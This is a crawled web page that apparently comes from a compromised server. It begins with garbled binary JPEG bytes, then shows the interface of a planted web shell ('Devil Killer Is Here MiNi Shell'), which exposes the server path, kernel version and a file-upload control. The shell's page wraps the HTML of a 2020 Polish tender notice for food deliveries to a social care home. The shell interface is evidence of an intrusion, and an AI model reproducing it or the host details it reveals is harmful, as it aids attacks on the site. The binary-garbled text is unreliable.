JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20201116/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20201116/610969-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 610969-N-2020 z dnia 2020-11-16 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Dom Pomocy Społecznej</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawy artykułów spożywczych</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Dom Pomocy Społecznej</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">29792200000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Więckowice, ul. Słoneczna</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">3</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">32-082</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Bolechowice</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">małopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">122 851 603</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">wieckowicezam@poczta.onet.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">122 852 010</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">dpswieckowice.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Jednostki organizacyjne administracji samorządowej</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">dpswieckowice.pl </span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">W formie dokumentów papierowych osobiście, pocztą, kurierem</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Dom Pomocy Społecznej, Więckowice, ul. Słoneczna 3, 32-082 Bolechowice</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawy artykułów spożywczych</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">DPS-ZP/2/2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">•	Przedmiotem zamówienia są artykuły spożywcze, w celu sporządzenia całodziennego wyżywienia dla 149 mieszkańców Domu, które Zamawiający w roku 2021 będzie sukcesywnie zamawiał w celu zapewnienia wyżywienia mieszkańcom, a wykonawcy, których oferty zostaną wybrane będą dostarczać zgodnie z bieżącymi zamówieniami Zamawiającego.•	Zamówienie zostało podzielone na części: Część 1 – Mleko i jego przetwory w roku 2021, Część 2 – Artykuły spożywcze sypkie i inne w roku 2021, Część 3 – Przetwory owocowe i warzywne w roku 2021, Część 4 – Mrożonki w roku 2021, Część 5 – Mięso i wędliny w roku 2021, Część 6 – Jaja kurze w roku 2021, Część 7 – Ziemniaki, warzywa okopowe, styczeń - kwiecień w roku 2021, Część 8 – Owoce, warzywa pozostałe, styczeń - kwiecień w roku 2021,</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">15000000-8</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia">2021-01-02</span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2021-12-31</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'>2021-01-02 </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2021-12-31</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) 